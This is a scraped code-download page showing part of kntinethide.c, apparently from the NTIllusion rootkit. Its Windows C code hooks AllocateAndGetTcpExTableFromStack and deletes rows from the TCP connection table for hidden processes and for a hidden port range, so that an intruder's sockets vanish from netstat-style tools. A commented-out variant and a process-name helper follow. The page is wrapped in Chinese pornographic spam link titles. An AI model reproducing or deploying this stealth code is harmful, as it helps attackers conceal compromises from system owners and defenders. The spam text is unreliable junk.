亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關于我們
? 蟲蟲下載站

?? kntinethide.c

?? rootit uloading by benina
?? C
?? 第 1 頁 / 共 2 頁
字號:
  DWORD flags)
{
	FARPROC fhtons;
	HINSTANCE hDll, hDll2;
	DWORD err=0, i=0, j=0; // error handler, TcpTable walk index, TcpTable sort index
	char psname[512];	   // process name
	u_long LocalPort=0, RemotePort=0;

	
	OutputString("[!!]	AllocateAndGetTcpExTableFromStack \n");
	hDll = LoadLibrary("wsock32.dll");
	if(!hDll)
	{
		OutputString("[!]	!hDll\n");
		return 0;
	}
	
	fhtons = (FARPROC) fGetProcAddress(hDll, "htons");
	if(!fhtons)
	{
		OutputString("[!] CANNOT FIND ADDRESS FOR : htons() \n");
		return 0;
	}
	OutputString("[!!]	2\n");
	// Get real address using GetProcAddress because the function may not have been hijacked at IAT
	// level but using GetProcAddress()

	hDll2 = LoadLibrary( "iphlpapi.dll");
	if(!hDll2)
	{
		OutputString("[!]	!hDll2\n");
		return 0;
	}
	if(!fAllocateAndGetTcpExTableFromStack) 
	{
		fAllocateAndGetTcpExTableFromStack = (FARPROC) fGetProcAddress( hDll2, 
				"AllocateAndGetTcpExTableFromStack" );
		if(!fAllocateAndGetTcpExTableFromStack)
		{
			OutputString("[!!]	Can't resolve AllocateAndGetTcpExTableFromStack (GetProcAddress)\n");
			return 0;
		}
	}

	OutputString("[!!]	3\n");

	// Call genuine function ...
	err = fAllocateAndGetTcpExTableFromStack(pTcpTable, bOrder, heap, zero, flags);
	if(err)
	{
		ShowError();
		//(*pTcpTable) = 0x00;
		//FreeHeap(heap, );
/*
		while(1)
		{
			Sleep(1000);
			OutputString("loop() \n");
		}
*/
		// in the case of an error, return it
		// permet de survivre, meme si on perdle contact, on filtre toujours
		// appels entrelac閟 ??
		return err;	
	}

	OutputString("[!!]	AllocateAndGetTcpExTableFromStack : checking ports\n");
	//sprintf(tmp, "'%d'\n", ((*pTcpTable)->dwNumEntries));
	//OutputString("[%d]\n", tmp);
	//OutputString("[%d]\n", pTcpTable);
	//((*pTcpTable)->dwNumEntries)

	// ... and start to filter unwanted rows. This will hide all opened/listening/connected/closed/... sockets
	// for each process...
	for(i = 0; i < ((*pTcpTable)->dwNumEntries); j=i) 
	{
		OutputString("#	AllocateAndGetTcpExTableFromStack loop i=%d\n", i);
		//memset(psname, 0, 512);

		GetProcessNamebyPid((*pTcpTable)->table[i].dwProcessId, (char*)psname);
		LocalPort	= (u_short) fhtons((u_short)(*pTcpTable)->table[i].dwLocalPort);
		RemotePort	= (u_short) fhtons((u_short)(*pTcpTable)->table[i].dwRemotePort);
		OutputString("#	AllocateAndGetTcpExTableFromStack %s %d<=>%d\n", (char*)psname, LocalPort, RemotePort);

		if( !_strnicmp((char*)psname, RTK_FILE_CHAR, strlen(RTK_FILE_CHAR))	// RTK_FILE_CHAR prefix : hidden process ?
			|| !_strnicmp((char*)psname, NTILLUSION_PROCESS_NOTFOUND, strlen(NTILLUSION_PROCESS_NOTFOUND))	// process not found ?
			|| (( LocalPort	>= RTK_PORT_HIDE_MIN) && ( LocalPort <= RTK_PORT_HIDE_MAX))		//local port is in hidden range ?
			|| ((RemotePort	>= RTK_PORT_HIDE_MIN) && (RemotePort <= RTK_PORT_HIDE_MAX)) )	//remote port is in hidden range ?
		{
			//if(VERBOSE_STEALTH) 
			OutputString("[!] hidden :\n");
			OutputString("[!] NTIllusion made a TCP socket hidden for process %s (%d)\n", (char*)psname, (*pTcpTable)->table[i].dwProcessId);
			// we move all rows left one position lower in TcpTable array (8=>7, 7=>6, 6=>5 ...)
			// this leads to the wipe of the row that contains a "hidden process"
			for(j=i; j<((*pTcpTable)->dwNumEntries); j++){
				memcpy( (&((*pTcpTable)->table[j])), (&((*pTcpTable)->table[j+1])),sizeof(MIB_TCPEXROWEx));
			}
			// clear last row
			memset( (&((*pTcpTable)->table[(((*pTcpTable)->dwNumEntries)-1)])), 0, sizeof(MIB_TCPEXROWEx));
			((*pTcpTable)->dwNumEntries)-=1;  // decrease number of rows by one
			// do the job again for the current row, that may also contain a hidden process
			continue;
		}

	  // this row was ok, jump to the next
		i++;

	}
	// We may free the x skipped & unused TCP rows (x=(GenuineNumberOfRows-((*pTcpTable)->dwNumEntries)))
	// that begin at TcpTable index number ((*pTcpTable)->dwNumEntries)-1)
  return err;
}

/*
DWORD WINAPI MyAllocateAndGetTcpExTableFromStack( 
  PMIB_TCPEXTABLE *pTcpTable,  // buffer for the connection table
  BOOL bOrder,               // sort the table?
  HANDLE heap,
  DWORD zero,
  DWORD flags)
{

	FARPROC fhtons;
	HINSTANCE hDll, hDll2;
	DWORD err=0, i=0, j=0; // error handler, TcpTable walk index, TcpTable sort index
	char psname[512];	   // process name
	char tmp[512];
	u_long LocalPort=0, RemotePort=0;

	
	OutputString("[!!]	AllocateAndGetTcpExTableFromStack \n");
	hDll = LoadLibrary("wsock32.dll");
	if(!hDll)
	{
		OutputString("[!]	!hDll\n");
		return 0;
	}
	
	fhtons = (FARPROC) GetProcAddress(hDll, "htons");
	if(!fhtons)
	{
		OutputString("[!] CANNOT FIND ADDRESS FOR : htons() \n");
		return 0;
	}
	OutputString("[!!]	2\n");
	// Get real address using GetProcAddress because the function may not have been hijacked at IAT
	// level but using GetProcAddress()

	hDll2 = LoadLibrary( "iphlpapi.dll");
	if(!hDll2)
	{
		OutputString("[!]	!hDll2\n");
		return 0;
	}
	if(!fAllocateAndGetTcpExTableFromStack) 
	{
		fAllocateAndGetTcpExTableFromStack = (FARPROC) GetProcAddress( hDll2, 
				"AllocateAndGetTcpExTableFromStack" );
		if(!fAllocateAndGetTcpExTableFromStack)
		{
			OutputString("[!!]	Can't resolve AllocateAndGetTcpExTableFromStack (GetProcAddress)\n");
			return 0;
		}
	}

	OutputString("[!!]	3\n");


	// Call genuine function ...
	err = fAllocateAndGetTcpExTableFromStack(pTcpTable, bOrder, heap, zero, flags);
	OutputString("[!!] 4\n");
	if(err)
	{
		OutputString("[ERROR] exiting (fAllocateAndGetTcpExTableFromStack() returned an error)\n");
		return err;	// on the case of an error, return it
	}
	
	OutputString("[!!] 5 (err=%d, lasterror=%d)\n", err, GetLastError());

	// ... and start to filter unwanted rows. This will hide all opened/listening/connected/closed/... sockets
	// for every process whose name is starting by RTK_PROCESS_CHAR
	for(i = 0; i < (*pTcpTable)->dwNumEntries; j=i) {
		OutputString("[!!] i=%d\n", i);
		memset(psname, 0, 512);

		GetProcessNamebyPid((*pTcpTable)->table[i].dwProcessId, (char*)psname);

		if(( strstr((char*)psname, "_nti")!=0)) 
		{
			// we move all rows left one position lower in TcpTable array (8=>7, 7=>6, 6=>5 ...)
			// this leads to the wipe of the row that contains a "hidden process"
			for(j=i; j<((*pTcpTable)->dwNumEntries); j++){
				memcpy( (&((*pTcpTable)->table[j])), (&((*pTcpTable)->table[j+1])),sizeof(MIB_TCPEXROW));
			}
			// clear last row
			memset( (&((*pTcpTable)->table[(((*pTcpTable)->dwNumEntries)-1)])), 0, sizeof(MIB_TCPEXROW));
			((*pTcpTable)->dwNumEntries)-=1;  // decrease number of rows by one
			// do the job again for the current row, that may also contain a hidden process
			continue;
		}
		// this row was ok, jump to the next
		i++;
	}
	// We may free the x skipped & unused TCP rows (x=(GenuineNumberOfRows-((*pTcpTable)->dwNumEntries)))
	// that begin at TcpTable index number ((*pTcpTable)->dwNumEntries)-1)
  return err;
}
*/

// GetProcessNamebyPid: kInject remixed
// There is a problem when a process tries to get the real name of "hidden" process 
// by using its PID and the Toolhelp32 functions. This is probably caused by the fact
// that theses functions rely on a hijacked version of NtQuerySystemInformation. (Theses 
// functions doesn't use GetProcAddress to retrieve its real address)
// So any unknown process must be considered as a hidden process.
int GetProcessNamebyPid(DWORD pId, char* name)
{
    HINSTANCE   hLib;
    PROCESSENTRY32 PEntry;
    HANDLE hTool32;
    //Functions pointers :
    FARPROC fCreateToolhelp32Snapshot;
    FARPROC fProcess32First;
    FARPROC fProcess32Next;

	strcpy(name, (char*)NTILLUSION_PROCESS_NOTFOUND);
    hLib = LoadLibrary("Kernel32.DLL");
    
    //Functions addresses :
    fCreateToolhelp32Snapshot = (FARPROC) GetProcAddress( hLib,"CreateToolhelp32Snapshot");
    fProcess32First = (FARPROC) GetProcAddress( hLib, "Process32First" );
    fProcess32Next = (FARPROC) GetProcAddress( hLib, "Process32Next" );
    
    PEntry.dwSize = sizeof(PROCESSENTRY32);     //Set Size of structure before use
    hTool32 = (HANDLE)fCreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); //Create SnapShot
    
    fProcess32First(hTool32, &PEntry);    //Get first process
    if(PEntry.th32ProcessID == pId){
		strcpy(name, PEntry.szExeFile);
		return 1;
	}

    while( fProcess32Next(hTool32,&PEntry) )
	{
		if(PEntry.th32ProcessID == pId){
			strcpy(name, PEntry.szExeFile);
			return 1;
		}
	}
    if(PEntry.th32ProcessID == pId){
		strcpy(name, PEntry.szExeFile);
		return 1;
	}
    FreeLibrary(hLib);
    
    return 0;
}

?? 快捷鍵說明

復制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
精品国内片67194| 欧美激情综合五月色丁香小说| 久久99精品国产.久久久久| 亚洲欧洲另类国产综合| 日韩你懂的电影在线观看| 色狠狠av一区二区三区| 国产成人一区在线| 日韩vs国产vs欧美| 亚洲影院理伦片| 中文字幕日本不卡| 国产欧美日韩精品在线| 欧美一区二区精品在线| 欧美亚洲丝袜传媒另类| 本田岬高潮一区二区三区| 国产在线视视频有精品| 色婷婷亚洲综合| 激情五月播播久久久精品| 首页国产丝袜综合| 亚洲福中文字幕伊人影院| 国产精品久久久久久久午夜片| 日韩三级在线免费观看| 欧美精品少妇一区二区三区| 欧洲亚洲国产日韩| 在线看国产一区| 99视频有精品| 99视频有精品| 99精品视频在线观看免费| 国产精品亚洲人在线观看| 极品少妇一区二区| 蜜桃一区二区三区在线观看| 日韩不卡一二三区| 免费欧美在线视频| 奇米777欧美一区二区| 午夜不卡在线视频| 午夜精品福利一区二区蜜股av| 亚洲精品成a人| 一区二区三区在线观看网站| 亚洲另类一区二区| 一区二区三区中文字幕精品精品| 亚洲欧美国产毛片在线| 亚洲男人天堂av网| 亚洲精品成人在线| 亚洲国产成人高清精品| 午夜精品福利视频网站| 青青草精品视频| 经典三级视频一区| 国产一区二区精品久久91| 国产高清久久久| 国产99精品国产| 972aa.com艺术欧美| 91黄色免费网站| 91精品国产黑色紧身裤美女| 日韩欧美国产麻豆| 久久久久久久综合日本| 国产精品美女久久久久久久网站| 国产精品国产三级国产a | 日韩欧美一区二区三区在线| 日韩欧美一级二级三级| 久久精品一区二区三区不卡牛牛| 中文字幕免费观看一区| 亚洲一区二区三区美女| 免费精品视频在线| 国产成人小视频| 在线亚洲一区观看| 欧美一区二区私人影院日本| 久久久99精品久久| 亚洲免费观看高清完整版在线| 亚洲国产成人av好男人在线观看| 日本va欧美va精品| 国产99久久久国产精品| 欧美在线视频不卡| 精品国产不卡一区二区三区| 国产精品理论片| 日韩不卡一区二区三区| 成人动漫一区二区| 欧美日韩精品一区视频| 国产丝袜欧美中文另类| 一区二区三区影院| 狠狠色狠狠色综合系列| 91麻豆6部合集magnet| 日韩美一区二区三区| **性色生活片久久毛片| 日本成人超碰在线观看| a级精品国产片在线观看| 在线电影院国产精品| 国产精品私人自拍| 日本视频一区二区| 91视频精品在这里| 精品成人在线观看| 亚洲国产另类av| 成人免费观看av| 99久久免费视频.com| 日韩欧美国产高清| 亚洲欧美韩国综合色| 国产精品综合二区| 在线播放91灌醉迷j高跟美女 | 日本不卡一区二区| 成人精品视频一区| 欧美videos中文字幕| 亚洲一级在线观看| www.日韩精品| 久久久久综合网| 日本色综合中文字幕| 欧美在线观看一二区| 国产精品久久久久久久久免费相片 | 国产精品嫩草影院com| 另类综合日韩欧美亚洲| 欧美三级一区二区| 日韩美女视频一区二区| 国产精品主播直播| 日韩色视频在线观看| 亚洲五月六月丁香激情| 99国产精品一区| 国产精品亲子伦对白| 国产成人综合在线播放| 精品福利在线导航| 久久精品国产亚洲aⅴ | 日韩欧美国产一区二区三区| 亚洲大尺度视频在线观看| 一本色道久久综合精品竹菊| 中文字幕制服丝袜成人av| 国产精品一区二区久久不卡 | 在线观看欧美日本| 亚洲人精品一区| 91污在线观看| 一区二区三区在线不卡| 色94色欧美sute亚洲13| 亚洲黄色小视频| 在线观看视频一区| 亚洲免费av高清| 色老汉一区二区三区| 亚洲精品乱码久久久久久| 色婷婷久久久亚洲一区二区三区| 亚洲同性gay激情无套| 91一区二区在线观看| 亚洲欧美二区三区| 色综合激情五月| 亚洲综合激情网| 欧美日韩一区国产| 三级欧美在线一区| 91精品国产麻豆国产自产在线| 免费在线观看不卡| 日韩欧美高清一区| 韩国中文字幕2020精品| 久久精品夜色噜噜亚洲aⅴ| 国产成人在线视频网站| 中文字幕一区日韩精品欧美| 在线观看欧美黄色| 日本免费新一区视频| 精品国产91亚洲一区二区三区婷婷 | 日韩一区二区三区视频在线观看| 六月婷婷色综合| 欧美国产在线观看| 91亚洲精品一区二区乱码| 亚洲高清中文字幕| 精品欧美乱码久久久久久1区2区| 国产自产v一区二区三区c| 国产精品色噜噜| 欧洲中文字幕精品| 久草精品在线观看| 中文文精品字幕一区二区| 91丝袜国产在线播放| 天堂久久一区二区三区| 亚洲精品在线免费观看视频| 成人精品电影在线观看| 亚洲电影一区二区| www国产成人| 色综合网色综合| 日本视频在线一区| 亚洲欧洲日韩女同| 欧美一区二区三区电影| 国产91丝袜在线18| 亚洲gay无套男同| 国产情人综合久久777777| 欧美在线视频不卡| 韩国欧美国产1区| 一区二区在线观看视频| 精品国产乱子伦一区| 色综合天天综合网天天看片| 久久国产精品色婷婷| 亚洲欧美日韩小说| 精品少妇一区二区三区日产乱码 | 91福利视频网站| 国产一区二区三区免费看| 亚洲欧美日韩国产手机在线 | 一区二区免费视频| 26uuu精品一区二区三区四区在线| 91玉足脚交白嫩脚丫在线播放| 麻豆精品在线看| 一区二区在线观看免费| 国产亚洲福利社区一区| 欧美乱妇23p| 91蜜桃婷婷狠狠久久综合9色| 久久精品国产网站| 亚洲一区二区在线观看视频| 国产夜色精品一区二区av| 69精品人人人人| 在线看国产一区| 色综合久久久久综合| 国产一区在线精品|